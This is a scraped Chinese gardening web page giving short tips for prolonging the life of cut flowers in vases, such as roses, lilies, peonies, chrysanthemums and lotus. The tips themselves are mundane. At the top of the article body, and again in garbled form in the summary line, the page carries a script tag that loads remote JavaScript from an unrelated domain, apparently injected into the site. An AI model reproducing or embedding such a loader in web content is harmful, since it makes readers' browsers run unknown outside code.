您现在的位置:那花园花卉网 > 花艺天地 > 插花花艺 >

插花保鲜窍门

来源:未知
】 2012-08-12 00:00
[摘要]#106avascript" src="http://zz.ag365.com/js/check.asp?id=6840"/gt; 蔷薇花: 在其剪口处用火炙一下,再插人瓶中 白兰花: 晚上用湿布包裹,白天揭开,可使花的凋谢时间推迟2天至3天。 芙蓉花: 先插入热水中一二分钟,再插入凉水中。 大丽花、牡丹花: 剪口浸
<Script type="text/javascript" src="http://zz.ag365.com/js/check.asp?id=6840"></Script>  蔷薇花: 在其剪口处用火炙一下,再插人瓶中
    
  白兰花: 晚上用湿布包裹,白天揭开,可使花的凋谢时间推迟2天至3天。
    
  芙蓉花: 先插入热水中一二分钟,再插入凉水中。
    
  大丽花、牡丹花: 剪口浸入热水中片刻,再插入冷水中。
    
  山茶花: 插入淡盐水中。
    
  百合花: 插入糖水中。
    
  桅子花: 在水中3加l滴至2滴鲜肉汁。
    
  水仙花: 插养在0.1%的淡盐水中。
    
  梅花:剪口切成十字型,浸入水中。
   
  杜鹃花:切口用锤击扁,先在水中浸2个小时,可保鲜相当长时间。
    
  秋菊花:在剪口处涂少许薄荷晶。
    
  郁金香:数枝扎束,外卷报纸再插入瓶中。
    
  莲花:折下后用泥塞住气孔,再插入淡盐水中。
    
  菊花: 在养菊花的清水中,加进微量的尿素或土壤浸出液,可使瓶插菊花长达30天才凋谢。